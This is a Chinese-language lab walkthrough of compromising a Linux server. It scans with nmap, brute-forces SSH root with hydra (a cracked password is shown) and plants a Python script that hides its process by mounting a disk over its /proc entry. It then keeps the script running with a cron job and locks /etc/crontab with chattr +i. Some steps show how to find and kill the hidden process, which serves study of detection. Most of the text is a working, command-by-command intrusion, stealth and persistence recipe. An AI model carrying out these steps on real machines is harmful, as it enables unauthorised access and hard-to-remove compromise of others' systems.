1.1 攻击流程
1、攻击流程
参考博客:https://cloud.tencent.com/developer/article/1180906
https://blog.csdn.net/Tahir_111/article/details/82389570
1.2 安装Kali-linux用于暴力破解linux密码
1、借助kali-linux暴力破解linux密码
root@kali:~# nmap -sP 192.168.56.0/24 # 查询192.168.56.0/24网段中存活的主机 MAC Address: 00:50:56:FC:8B:AF (VMware) Nmap scan report for 192.168.56.11 [root@linux-node4 aaa]# nmap 192.168.56.11 # 查询指定主机开启的服务 22/tcp open ssh 3031/tcp open eppc 8001/tcp open vcom-tunnel root@kali:~# hydra -l root -P passwd.txt -t 1 -vV -e ns 192.168.56.11 ssh # 暴力破解密码 [22][ssh] host: 192.168.56.11 login: root password: chnsys@2016
2、远程被控服务器添加病毒脚本
root@kali:~# ssh root@192.168.56.14 # 通过kali-linux登录 192.168.56.14 [root@linux-node4 aaa]# vim test.py # 写一个脚本模拟病毒 # -*- coding:utf-8 -*- # test.py测试脚本 import os import time while True: pid = os.getpid() # 当然也可以使用mount -o bind /empty/dir /porc/xxxx os.system("mount /dev/sda1 /proc/%s"%str(pid)) #time.sleep(1) [root@linux-node4 aaa]# nohup python test.py > /dev/null 2>&1 & # 后台执行python脚本
3、尝试找到病毒进程
[root@linux-node4 aaa]# top # 发现cpu大量占用但没有找到刻意进程 [root@linux-node4 aaa]# ps -aux # 无可疑进程 [root@dbserver ~]# ps -aux --sort=-pcpu|head -10 # 按CPU使用比排序降序取前十,找不到可疑进程 [root@linux-node4 aaa]# mount # 发现一个可以挂载 /dev/sda1 on /proc/100262 type xfs (rw,relatime,attr2,inode64,noquota) [root@linux-node4 aaa]# kill -9 100262 # 杀死这个可以进程CPU就恢复啦
4、添加定时任务让脚本定时启动
[root@linux-node1 ~]# vim /etc/crontab */1 * * * * root python /aaa/test.py > /dev/null 2>&1 & [root@linux-node4 /]# systemctl restart crond [root@linux-node4 /]# mount [root@linux-node4 /]# kill -9 8765 # 发现杀不完,刚杀掉有启动 [root@linux-node1 ~]# vim /etc/crontab # 只能到 /etc/crontab 先删除定时任务在杀 [root@linux-node4 /]# systemctl restart crond # 重启服务,否则有时不生效
5、还可以添加文件锁
'''chattr文件加锁''' [root@linux-node4 /]# chattr +i /etc/crontab # 给文件加锁 [root@linux-node4 /]# vim /etc/crontab # root用户都无法修改 rm: cannot remove ‘test.py’: Operation not permitted [root@linux-node1 aaa]# chattr -i /etc/crontab # 解除锁 [root@linux-node1 aaa]# vim /etc/crontab # 发现可以正常修改 /etc/crontab